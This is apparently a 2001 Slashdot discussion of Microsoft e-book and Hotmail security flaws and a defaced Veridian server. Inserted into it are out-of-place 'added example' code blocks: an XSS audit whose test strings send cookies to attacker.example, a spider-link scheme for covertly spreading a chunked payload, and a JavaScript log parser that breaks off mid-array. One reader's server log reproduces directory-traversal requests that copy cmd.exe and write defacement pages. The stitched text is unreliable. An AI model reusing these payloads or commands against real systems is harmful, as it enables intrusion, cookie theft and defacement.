MS Security: On A Path As Clear As It Is Reliable
bobthemonkey13 writes: "It appears that Microsoft's 'secure' E-Book system has been cracked. MIT Technology Review is reporting that an anonymous programmer has figured out how to bypass the 'advanced antipiracy features' in Microsoft Reader. This sounds a lot like what Dmitry did except for two things: The MS E-Book hacker has (wisely) decided to remain anonymous, and he's not publishing his program. God bless the U.S., where moving a book from your home to your office is a federal offence."
Along similar lines, an Anonymous Coward indicates this story at USA Today titled "Expert Hacks Hotmail in 1 Line of Code." "I'm in awe! Unless someone can figure out how to execute pseudocode or half a line this isn't beatable. I hope this gets fixed or the whole future of pay-per-view web services could be impacted. :-q" Good thing Microsoft isn't quite sure what to do with all this universal-password stuff. (Thanks to Sacha Prins.)
Jamie adds:
In other news about poor security where you least expect it, Kitetoa informed Veridian a little while ago that: "Any script kiddy can root your web site. And... By the way... Someone already did it (as you should have seen at www.veridian.com/upload/ if you knew anything about internet security)."
I don't know what that URL gives you now, but as of this writing, and for the last several hours, it's read:
fuck USA Government
fuck PoizonBOx
contact:sysadmcn@yahoo.com.cn
This is the same Veridian that the Defense Department picked to track computer network attacks on DoD systems, specifically attacks coming from China.
This is the US, after all. Get it right.
did anyone *really* think that anything from M$ would ever be "secure"?
I mean, c'mon.... who the hell do they think they're fooling?
this guy should upload the code to freenet where, hopefully, it is impossible to remove the program or discover the author. This is the exact kind of thing freenet was designed for, so if the author is out there in slashland, go for it! Civil Disobedience ra ra ra!
Well, I also cracked the MS e-book but this margin isn't wide enough to show proof.
not to use it, i'm just curious what he coded it in? perl? shell with netcat or something? java? i must admit i don't know a damn thing about this cross site scripting baloney... ahh for the old days of cgi scripts and html and that's it...
The unfortunate thing is, that while it seems "M$ software gets hacked every other month", the general consumer isn't making security (or should I say the lack of it? :) a big deal.
... but that headline is simply hitting way below the belt. There's plenty of security holes in every stock Linux distro too, you know.
- A.P.
"Remember when the U.S. had a drug problem, and then we declared a War On Drugs, and now you can't buy drugs anymore?"
The difference being, there are things that Microsoft is trying to do that the OS community will never attempt (part because we consider it unethical, part because we consider it impossible).
Everytime I read about hailstorm, I am in shock but at the same time scared.
First off, I can't believe that Microsoft thinks they should be in control of so much personal information.
Second, that Microsoft thinks they can somehow keep it safe.
Third, and this is what scares me. A lot of John Q. Public will give them all this information.
Better them than me I guess.
As far as the ebook thing is concerned, so what? Near my home is a place called a library, and in it is a device called a photocopier. I've been able to make copies of books electronically for years. Next please.
You're using her as bait, Master!
With new forms of active content being added to web pages all the time, it is amazing that anything with dynamic content. I know that's vague, but that sounds like the gist of it.
"Yet the more convenient and flexible Microsoft and others make the Web..."
Microshaft making the web more convenient and flexible?...I beg to differ.
M$ is to the web (and innovation in general) what a blanket is to a fire - A retarding agent.
Freenet is not really the only solution if the programmer chose to release the program and not reveal his identity. There are numerous other channels available which will let him preserve his anonymity. The only advantage to freenet is that it at least has a somewhat legitimate charter, whereas other methods are typically underground and shady.
But still, if done properly, it could be released and spread without anyone finding out who the author is. The danger is if that person ever told ANYONE about it. If he did, then he's not truly anonymous, and given enough of an incentive, someone might be tempted to talk. At least, without releasing any code, then it's technically all hearsay and a lot less likely to be in violation of some strange law.
I fear however that this is how it will have to be done in the future if the silly laws don't get overturned. Either that, or some REALLY important sensitive document will have to be cracked and released publicly to the embarrassment of a large organization with a lot of people chanting "we told you so" before those in power might take a second glance and realize that perhaps peer review for security is a good idea after all.
-Restil
Play with my webcams and lights here
Did anyone ever wonder whether M$ do this deliberately?
;)
Recently they've had some holes (much like this) that you'd have to be out of your head smoking crack to miss.
Quality assurance at Microsoft is better than this when it comes to other areas. Could it just be that it's easier and cheaper to have somebody else find the holes and then, as the mega-funded publicity department goes into top gear, issue a patch (where appropriate)?
Either that or Microsoft buys a lot of crack!
"How much truth can advertising buy?" - iNsuRge - AK47
Oh, great! Looks like what people have been saying will come true -- The DMCA will stifle innovation, quality, security,.... etc. Now whenever there's a flaw in something, people will be too afraid to report it, for fear of being prosecuted under the DMCA. Back to the Dark Ages for us!
I've never liked USA Today as a news source.
The headline clearly reads, "Expert hacks Hotmail in 1 line of code". Then in the second sentence of the first paragraph, "It took just three lines of code for Grossman to breach Hotmail filters..."
Brilliant reporting. Whatever generates page hits I guess...
while true; do telnet www.hotmail.com 80 <
Then just sit back and wait.
On a related note, i'd like to dispel a common myth. Real Programmers don't use 'cat > a.out' or 'cat
--
Mod up a post Rob doesn't like and you'll never mod again
So, let's say that MS Hailstorm is implemented and within a couple of years, a good portion of users have their data and software settings stored on .Net servers, and can access it with their Passport login and password.
Now let's say that someone finds another flaw in passport (I know, hard to believe, but go with me here). Needless to say, Hailstorm users will be left vulnerable. The question is, will the Hailstorm and Passport EULA protect MS when it comes to legal liability for a) lost data, and b) copied or stolen data (loss of intellectual property, etc...)
My guess is that even if they are to blame, MS won't be legally liable. Doesn't sound like a good choice for users...
Buy Hex-Rated Stuff, fight the DMCA!
did I read that cnet article right, or did they say, with a straight face, that Microsoft's big announcement was that they said they'd think of something by 2002?
:)
Um.... wow.
A year ago I would have been much more inclined to agree with you... but it's kinda funny. As time goes on, Windows seems to have more network services, and more problems, while Linux distros are becoming more sane and simple, following OpenBSD's lead...
It took just three lines of code for Grossman to breach Hotmail filters and access Passport ID and credit card data. The second time it took just one line. And the former Yahoo security auditor says he could do it again given 8 hours.
- sigs are for wimps.
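The articles quoted in this thread say Grossman got past Hotmail's filters but do not publish his code, and several posts below ask what cross-site scripting even is. The following is an added example, not code from the original thread and not Grossman's method: a hypothetical blacklist filter of the "strip the <script> tags" kind, a renderer that escapes instead, and a small checker that reports what a browser would still execute. The mail bodies and the attacker.example host are constructed for the demonstration.

```python
import html
import re
from html.parser import HTMLParser

# Hypothetical blacklist filter, modelled on the "strip <script> tags" approach; it is NOT
# Hotmail's filter, whose details the articles do not publish.
_SCRIPT_TAG = re.compile(r"</?script[^>]*>", re.IGNORECASE)


def naive_filter(untrusted_html: str) -> str:
    """Blacklist approach: delete <script> tags, emit the rest as live HTML."""
    return _SCRIPT_TAG.sub("", untrusted_html)


def safe_render(untrusted_text: str) -> str:
    """Safe by construction: treat the input as text and escape every HTML metacharacter."""
    return html.escape(untrusted_text, quote=True)


class ActiveContentFinder(HTMLParser):
    """Report script tags, on* event handlers and javascript: URLs that a browser would run."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script tag")
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(f"{tag}@{name}")
            elif name in ("href", "src") and value and value.strip().lower().startswith("javascript:"):
                self.findings.append(f"{tag}@{name}=javascript:")


def active_content(rendered_html: str) -> list:
    """Parse the HTML the way a browser would and list the script execution vectors found."""
    finder = ActiveContentFinder()
    finder.feed(rendered_html)
    finder.close()
    return finder.findings


# Constructed test messages (not real mail). attacker.example is a placeholder host.
CONSTRUCTED_MAILS = [
    # the obvious case: the blacklist catches this one
    "<b>Hi</b> <script>document.location='http://attacker.example/?c='+document.cookie</script>",
    # no <script> tag at all: an event handler on an allowed tag
    "<img src=x onerror=\"document.location='http://attacker.example/?c='+document.cookie\">",
    # no <script> tag: a javascript: URL
    "<a href=\"javascript:alert(document.cookie)\">click</a>",
    # stripping the inner tag once leaves a well-formed <script> behind
    "<scr<script>ipt>alert(1)</script>",
]


def audit(messages):
    """For each message: what still executes after the blacklist filter vs. after escaping."""
    return [(active_content(naive_filter(m)), active_content(safe_render(m))) for m in messages]


if __name__ == "__main__":
    for msg, (after_filter, after_escape) in zip(CONSTRUCTED_MAILS, audit(CONSTRUCTED_MAILS)):
        print(f"{msg[:40]:42} filter={after_filter} escape={after_escape}")
```

The point of the comparison is that a blacklist is a race against every way a browser can be made to run script, while escaping for the HTML text context removes the race: the filter passes three of the four constructed messages, the escaped rendering passes none.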
the program doesn't exist.
I understand not wanting to be the next DMCA victim, but really, if the code isn't out there, then, it doesn't exist in my eyes.
ZOMG I WOULD LOVE TO KNOW ABOUT YOUR FEELINGS ON MACINTOSH VERSUS WINDOWS, VI VERSUS EMACS, AND HOW YOU'RE NOT A DORK
I don't really know why any large company would sign on for Hailstorm. No one really wants to be tied to any specific vendor for such an important part of their business. Granted, they're already tethered via their desktop PC's, but incorporating Hailstorm in to your business plan? You're basically putting your chance of profit in the hands of MS, who has a well known history of screwing over its own partners.
The problem, as I see it, is that American Express and others can beat their competitors to the punch by being a part of Hailstorm, providing services no one else does, but that goes with extreme risk. I guess that's why they haven't signed a contract with MS yet. It's a tough one for any company.
"I may not have morals, but I have standards."
As soon as the data leaves the server and lies digitally on the client machine, it'll get cracked. We've seen and heard it a thousand times before (ie. don't trust client side data in any cgi)...
And when you've got thousands of crackers, who want to be the first to crack the next latest thing, it's only a matter of time. I guess the only way around something like this is to have the data reside on the merchant's server and out of the hands of the client, but until we all can access the internet from everywhere, that won't happen.
- [grunby]
Well, this is strange. I'm sitting on a Windows 98 box with McAfee VShield v4.0.3 installed and virus definition files from 2001/06/13. Whenever I try to go to http://www.veridian.com/upload/ with either IE 4.01 or Netscape 4.70, McAfee pops a warning dialogue saying I have just downloaded a worm called "SunOS/BoxPoison.worm". I also have a small Perl program I can use to perform command-line HTTP downloads, and with it, I can download the page at http://www.veridian.com/upload/ without any problems.
I'm probably getting the warning because something in the HTML code matches the signature for a known worm. But still, if the message on the site isn't enough to scare people, the warning from their virus scanner certainly will!
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Content-Location: http://www.veridian.com/upload/index.htm
Date: Fri, 31 Aug 2001 03:51:47 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Wed, 09 May 2001 12:53:30 GMT
ETag: "6a8163c87d8c01:943"
Content-Length: 289
(Slashcode has inserted a few spaces into the following HTML... I hope this doesn't trip your virus scanner...)
<html><body bgcolor=black><br><br><br><br><br><br><table width=100%><td><p align="center"><font size=7 color=red>fuck USA Government</font><tr><td><p align="center"><font size=7 color=red>fuck PoizonBOx<tr><td><p align="center"><font size=4 color=red>contact:sysadmcn@yahoo.com.cn</html>
By this time amendments to the DMCA will probably allow them to have potential litigants summarily thrown in jail.
You're using her as bait, Master!
looks like ms is really testing the limits of their PR team. Maybe they might meet their match this time.
Got Freedom?
Thinking?
Among the headers from the veridian server when I retrieved the hacked page was
Last-Modified: Wed, 09 May 2001 12:53:30 GMT
I'm sure they'll get to it in due time...
Buy Hex-Rated Stuff, fight the DMCA!
I thought one of the golden rules of any sort of engineering is that before you try to do something, work out whether you can do it or not. Then try. Otherwise, it's all just wasted effort.
Am I the only person who thinks the whole concept of e-book encryption with the goal of stopping dedicated piracy is pointless?
Encrypting the contents of a transmission between two parties so that no 3rd party can read it is do-able, and has always been the main thrust of encryption. But what people like Adobe and Microsoft are essentially trying to do is make it impossible for the second party to read the message - because as soon as you read the message, you can reproduce it.
Assume that Adobe/Microsoft encrypt this with something that will provably take an untenable amount of time to crack - say 1024-bit public key encryption (sorry, IANACryptologist, I don't know the proper term.). I won't be able to crack the book itself, but since it appears on the screen at some point, I'm going to be able to read it sooner or later - and I can copy it. E-book encryption is the equivalent of the club lock - it'll stop casual copiers, not the dedicated copier - and this approach will only work until the first dedicated copier writes a program to let everyone else do it.
The same is true of sound files, though maybe not to the same level, as the concept of digital watermarking can be applied. I still think the same rules apply. As a result, I can't help but think of the whole e-book and sound-file encryption push as smoke and mirrors, meant to convince people that bits can be made uncopyable.
-- This post is about truth, beauty, freedom, and above all things, Karma
unlike *X, which has had peer review, troll review, flameage review, and intense discussional review between Buddha, Allah and God and the largest pool of software talent on the planet (literally)
MS source has been locked away in vaults in Rancho Redmond...doled out sparingly under a NDA that would allow MS to summarily repo your grandchillins
it has been reviewed by a relatively very small pool of some very talented, but frequently inexperienced programmers/developers/architects who are under massive pressure to deliver the next upgrade in MS on schedule or find themselves getting transferred to the code maintenance on MSN if they insist on any QC effort that would slow down delivery....
the "debate" between open source and closed, may well be the race between the tortoise and the hare
security has NEVER been a high priority at MS, more like extra chrome trim on a car....
and the more MS gets deployed in "financially attractive" or "critical" situations, the more exploited its gonna get
Hailstorm should probably be renamed "Hail Mary", for all the praying they'll be doing over its security
Ten quid, she's so easy to blind. And not a word is spoken...
Just so we're clear - is this the ISO with the unique identifier that The Reg talked about the other day?
cmon it's a huge pain to search the web for a windows cd key when you reformat cause you got h4x0r0ed and need to check outlook express & play solitare
Or.... God bless the US, where I can make something new and exciting and have it stolen from me, and with people like Stallman, actually turn around and point some moral wagging finger at ME!
Or... God bless the US, where picketers and protesters fight with hatred, anger, bigotry, intolerance and violence against things that they claim are bigoted and against human rights? The USA, country of illogical and irrational people that would sell their own mothers for the right price and then turn around and point their hypocritical fingers at someone else. The country where processes are loved to the point that results are ignored and facts are shunned.
...was the actual content of the page, which coincides with strings in the actual virus itself that VirusShield is looking for. The virus that infected the machine must carry a copy of the page verbatim inside itself, and that is one of McAfee's clues to finding it.
Black holes are where the Matrix raised SIGFPE
Microsoft's favorite security model - security through obscurity - has very little to do with Hailstorm and everything to do with the DMCA. Not only does the producer of the security mechanism simply not publish the details of that mechanism, but through the wonders of the DMCA, Microsoft is empowered to enforce their security model by preventing the publication of holes discovered in the security system, thereby maintaining the obscurity.
Sarcasm aside, does it really matter how secure hailstorm really is, if Microsoft can sue into oblivion anyone who publicizes or even researches security exploits related to the system...?
--CTH
--Got Lists? | Top 95 Star Wars Line
Linux manages to successfully use the same OS for both workstation and server purposes. In fact, I'm quite glad that my workstation doubles as a server for testing purposes, and that I am able to work on my servers in a pinch. Linux successfully combines all the good aspects of both workstations and servers; why can't M$ do the same?
Even Slashdot wants to hide some things
I used to work at Microsoft, MS Press and MS Research. While at research I needed to hack IE so it would forget about ActiveX security. I managed to reckon the registry settings but still had some questions.
The place to ask questions to other developers internally is via Outlook groups (like usenet); it's surprising there isn't a better channel to converse with other Microsoft developers, maybe there is, but that's all I knew about. Anyway, so I posted a question to the IE-dev group about my problem. The response was surprising: the lead PM of IE started flaming me, telling me about how Microsoft can not have any more exploits in IE, how my manager would be informed etc..
I guess I should have mentioned that what I was doing was only going to go out to a few select terminally ill users.
The point I'm trying to make is that Microsoft is a large company made up of many small groups which don't necessarily talk to each other. I'm not saying this in their defense, but it helps explain how so many problems can arise over and over again. Even if I had just gone ahead and implemented this IE hack into something major I don't know who would have held me accountable; as far as I know software does not need to go through a standard security audit, each group has their own QA which will vary wildly.
-Jon
this is my sig.
No alarm for that page.
Suppose a company hates someone. It can invent a kind of "e-book" security using, say, a modified ROT-13 algorithm. Then challenge openly the guy to crack it. He does that and publishes his results. Now, can the company use DMCA to put that person in jail?
¦ ©® ±
That's easy. I can do that too. Type GOD on your Run Command dialog-bar in the StartUp menu.
Can anyone clearly explain cross-site scripting?
I've seen a few explanations of it but they didn't make any sense. I'm slow like that.
or a message from microsoft?
Would /. submit my ID and collaborate with the FBI? or would /. lead the civil disobedience to fight these stupid laws?
This is really boring.
Thank God we have Adequacy.org! Adequacy.org is the internet's most controversial site! Check out Adequacy.org today!
Damned, close your tags! Netscape Navigator doesn't show unclosed tables!
Proper HTML in your viri and hacks please!
bash$
But, unlike with M$ products, you can plug them, since you have the SOURCE.
From the Hotmail article above..
Grossman wasn't out to steal. Instead, he alerted a grateful Microsoft, which patched the holes before a malicious hacker could exploit them.
Why Didn't M$ just sue him under the DMCA? That seems damn much like the general feel US Corps have today, are we actually seeing some good side of Microsoft now? (naah)
> There's plenty of security holes in every stock Linux distro too, you know.
Yeah, on a dual boot machine you can hax0r Linux in one line, by typing msdos at the LILO prompt.
Sheesh, evil *and* a jerk. -- Jade
> > There's plenty of security holes in every stock Linux distro too, you know.
> But, unlike with M$ products, you can plug them, since you have the SOURCE.
And increasingly important, you can talk about them without fear of drawing a Go To Jail card.
Sheesh, evil *and* a jerk. -- Jade
What is wrong with keeping information on Your computer ready to fill in forms? That is exactly where the information belongs, not on MegaCorp central database.
If there was a standard on form tag names such as FirstName, Address1, HomePhone, etc. then it would be a simple thing to build browser functionality to fill in forms automatically when requested. This would eliminate the need to "register" at e-commerce sites and would make Microsoft's push into providing authentication service moot.
Geez, slashdot, I'm glad you finally decided to post a story about this. I guess my two earlier submissions weren't enough of a hint.
"who has a well known history of screwing over its own partners."
Care to provide some examples?
The company I work for partnered with Microsoft last year on their homeadvisor.com website. The section we worked on turned into a failure and the plug was pulled less than a year later, but Microsoft refunded to our company our investment into the site.
I knew someone else back in '94 who started a small company that was partnered with Microsoft and writing utilities for Windows NT. Microsoft helped them startup, paid for an ISDN hookup into their office so they could more easily communicate with Redmond, and then two years later bought out the company and moved them all to Redmond. The guys were more than happy to make that move!
Every company I'm aware of that has partnered with Microsoft has been treated very fairly.
Even Seattle Computing which provided the original MS-DOS was treated very well. While the initial contract was for only a few thousand, they received much more than that over time, and many of the company's employees ended up working at MS and becoming some of their early millionaire programmers.
I guess I'm curious about this well known history.
This seems like a case of "I hate Microsoft, and I'm going to say whatever I can to try to make them look bad, even though I can't really justify it."
I was just reading a fascinating article in the latest phrack about using web spiders (like search engines, etc) to deploy exploits, by putting URLs on a page which are actually exploits (like the code red exploit) and waiting for the spider to follow them. Many spiders pick up the URL, port, query string, and all.
This could be used to distribute data..here's how:
This guy could take his program, compress it, and encode into ascii and divide into N chunks.
Pick P web sites that might like to see the code (peacefire, slashdot, 2600, CNN, whatever). Then code up N*P links all over your web site, that look like this:
where <DATA> is one of the N chunks (plus some data saying which chunk it is, etc) and <SITE> is one of the P sites. Then wait for search engine spiders to index your site (most sites have them coming regularly). After a few months, the target sites will all have the data in their logs as the spiders follow your links!
This could be improved many ways, for instance the URL links could be spread over many hosts so that it is harder to track down the original source, the chunks could be encrypted, the receiving sites could automatically re-create the links so the data is kept circulating, different spiders could be fed different chunks, etc.
Sort of like a Freenet using search engine spiders as the transport. Has this been done? Time to get coding!!
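The scheme sketched in the post above (compress, ASCII-encode, split into N chunks, publish N*P links, let spiders carry the chunks into P sites' logs) is easy to get wrong at the receiving end, where chunks arrive out of order and duplicated. The following is an added example, not code from the post or from the phrack article; the link template the post refers to did not survive, so the query-string layout here (id, i, n, d) is an assumption, the site names are example hostnames, and the receiver's access log is constructed rather than real.

```python
import base64
import hashlib
import re
import zlib
from urllib.parse import parse_qs, urlencode, urlsplit

# Constructed stand-in for the file to be distributed; any bytes work.
PAYLOAD = b"constructed sample payload standing in for the program to be distributed\n" * 4
# Example hostnames only (the P receiving sites).
SITES = ["peacefire.example", "slashdot.example"]


def make_chunks(payload: bytes, chunk_size: int):
    """Compress, ASCII-encode, split. The id ties every chunk to one payload."""
    body = base64.urlsafe_b64encode(zlib.compress(payload)).decode("ascii")
    ident = hashlib.sha256(payload).hexdigest()[:16]
    return ident, [body[i:i + chunk_size] for i in range(0, len(body), chunk_size)]


def make_links(payload: bytes, sites, chunk_size: int = 8):
    """N*P links: every site gets every chunk, each link self-describing (id, index, count)."""
    ident, pieces = make_chunks(payload, chunk_size)
    links = [
        f"http://{site}/?" + urlencode({"id": ident, "i": i, "n": len(pieces), "d": piece})
        for site in sites
        for i, piece in enumerate(pieces)
    ]
    return ident, links


def constructed_receiver_log(links, site):
    """Constructed access log of what `site` would see after a spider fetched its links.
    Entries are deliberately reversed and one is duplicated, as real crawls are not tidy."""
    lines = []
    for k, link in enumerate(l for l in links if urlsplit(l).netloc == site):
        parts = urlsplit(link)
        lines.append(
            f'203.0.113.{k % 250} - - [31/Aug/2001:03:51:{k % 60:02d} +0000] '
            f'"GET {parts.path}?{parts.query} HTTP/1.0" 200 512 "-" "ExampleSpider/1.0"'
        )
    return lines[::-1] + lines[:1]


_REQUEST = re.compile(r'"GET (\S+) HTTP/1\.[01]"')


def reassemble(log_lines, ident: str):
    """Pull one payload's chunks out of an access log. Returns bytes, or None if any chunk is
    missing, the chunk counts disagree, or the reassembled data fails the integrity check."""
    parts, total = {}, None
    for line in log_lines:
        m = _REQUEST.search(line)
        if not m:
            continue
        qs = parse_qs(urlsplit(m.group(1)).query)
        if qs.get("id", [None])[0] != ident:
            continue
        try:
            idx, n = int(qs["i"][0]), int(qs["n"][0])
        except (KeyError, ValueError):
            continue
        if total is None:
            total = n
        elif n != total:
            return None  # two link sets claiming the same id with different sizes
        parts.setdefault(idx, qs["d"][0])  # duplicates from repeated crawls are harmless
    if total is None or len(parts) != total:
        return None  # at least one chunk never arrived
    try:
        data = zlib.decompress(base64.urlsafe_b64decode("".join(parts[i] for i in range(total))))
    except (KeyError, ValueError, zlib.error):
        return None
    return data if hashlib.sha256(data).hexdigest()[:16] == ident else None


if __name__ == "__main__":
    ident, links = make_links(PAYLOAD, SITES)
    log = constructed_receiver_log(links, SITES[1])
    print(len(links), "links published;", "recovered" if reassemble(log, ident) == PAYLOAD else "failed")
```

Two design points worth noting: the id is a hash of the plaintext, so the receiver can verify it got the right bytes rather than just some bytes, and every chunk carries the total count, so a partial crawl is detected instead of producing a truncated file. From the receiving site's side, the same parser is what you would run over your own logs to see whether your server is being used as an unwitting drop box.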
'cuz you can make a lot more money if you throw in a few more features into your standard OS, give it a new name, then charge people even more for it.
Using the Jim/Carol/Bob terminology...
If Jim wants to send Carol some information that they BOTH don't want Bob to see, no problem. This is the intent of crypto.
However, as soon as Carol decides that she doesn't mind Bob also getting the information, it is all over. No amount of crypto can prevent that transaction.
Given this quite obvious fact, it surprises me that ANY real crypto guy would even bother touching this problem.
While I agree with you in principle, this does tickle something in the back of my brain. If the DMCA causes so many people to wish to remain anonymous when they discover a vulnerability, why not FLOOD the media with bogus exploit reports? Just claim you won't release it due to the DMCA. Eventually, if enough random hackers do this, and enough people buy it, there will be so much paranoia of "hidden" exploits, that eventually somebody will call for mass disclosure. And the only way this can happen is for global DMCA amnesty.. similar to what brought about whistle blower legislation.
lick my shit covered cock and like it bitch
"No one has treaded here," said Evan Quinn, of the Hurwitz Group. "You are talking about changing the paradigm of how business and software works. They will provide an example for the rest of the industry regarding how to implement Web services."
Mr. Quinn, your attention is invited to:
here,
here,
or here
to see where the ground has been tread, the flag has been planted, and the ground has been tilled regarding paradigm changes and setting the example.
MSDOS...stolen idea.
Windows...stolen idea(Amiga)
MS Word...Wordperfect
Access...yep they invented databases too.
Excel...they added a gui.
the list goes on. The only innovation from Redmond has been from the Marketing department. But I preach to the choir.
Point is, if you really believe what you are saying to be true, I am sorry for you.
Have a nice day.
Drop me a line at:
Key ID: 0x54D1D809
My company (nameless for now). We are a MS "partner". A few weeks ago, they suddenly decided to tell us that they were developing the exact same software as our product, and they thanked us for all the help we had given them. If we want, they will let us continue to be a "partner" and give them our great ideas for as long as we still have funding (which runs out in December).
"Your superior intellect is no match for our puny weapons!"
But the difference in attitude is *obvious*.
Consider this experience: I'm sat in front of a Win2k server. If I turn off every single service I can, (including the built in FTP which requires IIS Admin, which starts opening up stuff just above 1024) I'm still left with 445 (TCP and UDP) - the SMB endpoint, and 135 (TCP) - the RPC endpoint mapper.
If you want to get rid of those, you'll have to firewall them.
MS has always made the tradeoff in favor of usability; let's not pretend they'll change overnight.
If those in the content industries have their way, you won't be able to for much longer.
From one of the articles: "It's easy ... to dream up very, very bad scenarios," says Shawn Hernan, security analyst for the federally funded Computer Emergency Response Team.
Pulease, I'm the last one to trivialize this whole thing, but reading this from a "federally funded" organization smells like FUD to me.
Sure you can dream up that stuff, where else would yer company be, right?
Keep in mind not everyone agrees with that sentiment. Some would argue that, if you discount the numerous security issues, Microsoft has perhaps the strongest track record of innovation in the industry. <----- Read it and see what I mean.
We know it's bunk. They ought to know it's bunk, and yet they don't.
sigh.
Is there evidence to prove that MS Reader has actually been cracked? I mean, he hasn't shown any code, he hasn't posted a cracked e-book.
Hell, I could claim that I just broke into the CIA. I know where Elvis is and I know who killed JFK, but the DMCA won't let me tell you.
From the cover sheet of the DMCA legislation: Basically, the DMCA is simply the mechanism within the United States, of implementing the WIPO treaty. Any country that is a signatory to this treaty will be implementing DMCA-like legislation. Just give it some time...
For those, who are unfamiliar with the history of Intellectual property law, the EFF has a good primer.
--CTH
--Got Lists? | Top 95 Star Wars Line
Some time in April I set up a Windows 2000 server just to play around with. I threw a few nics in it and played with routing so I could choose whether to use Telocity or Road Runner depending on which connection gave me the better ping to quake servers. I also used it for NAT and I wanted to learn ASP so this seemed like a decent plan.
I installed the first Service pack at whatever point it came out (I don't really recall) and thought I would be okay. Well, I wasn't, and I didn't discover that I wasn't until the whole code red thing. Here's part of my IIS log from a day in May, less than 2 weeks after having Win2k up and running :
[my IP has since changed]
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2001-05-06 01:36:54
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2001-05-06 01:36:54 212.164.32.40 - 24.29.76.248 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 -
2001-05-06 01:36:54 212.164.32.40 - 24.29.76.248 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+..\ 200 -
2001-05-06 01:36:55 212.164.32.40 - 24.29.76.248 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 -
2001-05-06 01:36:55 212.164.32.40 - 24.29.76.248 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>.././index.asp 502 -
2001-05-06 01:36:55 212.164.32.40 - 24.29.76.248 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>.././index.htm 502 -
2001-05-06 01:36:57 212.164.32.40 - 24.29.76.248 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>.././default.asp 502 -
2001-05-06 01:36:57 212.164.32.40 - 24.29.76.248 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>.././default.htm 502 -
2001-05-06 01:36:57 212.164.32.40 - 24.29.76.248 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 -
:-P
etc...
Looking through the logs, I was owned at least 30 more times until I discovered this at the end of July. Some said fuck USA government, some said fuck China government. I thought this was a code red exploit, but apparently not, as this happened on May 6 2001 and code red was (to my knowledge) first discovered several months later.
Anyway, I just find it appalling that MS would release a product that they expect people to use for commerce and "real" applications with a hole like this. I don't know if there was a patch for this or not, because frankly I was so disgusted with this that I formatted and installed linux. While I understand that the admin shoulders a great deal of the responsibility for the security of his boxes, and that no software is without its exploits, I think such a gaping hole in a flagship product is inexcusable, and I really marvel that Microsoft has not been held accountable for the shoddiness of its products. I feel bad for the MS sysadmins who have to deal with this kind of garbage on a much larger scale (both in the number of attacks and the number of machines they must "protect"). But then again, it's probably some MCSE writing all of this crap just to create job security for himself and the rest of the MCSEs out there...
rooooar
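The log excerpt above is in the IIS 5.0 W3C extended format, whose #Fields directive names the columns. As an added example (not the poster's code), here is a parser for that format plus a burst detector that flags a client firing many requests at the server within a few seconds, which is the pattern visible in the excerpt. The log lines, IPs and URIs below are constructed for this example.

```javascript
// Parser for the IIS 5.0 W3C extended log format, plus a simple burst detector.
// SAMPLE_LOG is constructed for this example; the addresses and URIs are not
// from the post above. One line is deliberately truncated after the method,
// like the lines in the poster's excerpt, to show how short rows are handled.
const SAMPLE_LOG = [
  '#Software: Microsoft Internet Information Services 5.0',
  '#Version: 1.0',
  '#Date: 2001-05-06 01:36:54',
  '#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)',
  '2001-05-06 01:36:54 198.51.100.7 - 192.0.2.10 80 GET /default.htm - 200 Mozilla/4.0+(compatible)',
  '2001-05-06 01:36:54 198.51.100.7 - 192.0.2.10 80 GET /default.htm - 200 Mozilla/4.0+(compatible)',
  '2001-05-06 01:36:55 198.51.100.7 - 192.0.2.10 80 GET /upload/ - 404 Mozilla/4.0+(compatible)',
  '2001-05-06 01:36:55 198.51.100.7 - 192.0.2.10 80 GET /upload/ - 404 Mozilla/4.0+(compatible)',
  '2001-05-06 01:36:55 198.51.100.7 - 192.0.2.10 80 GET /upload/ - 404 Mozilla/4.0+(compatible)',
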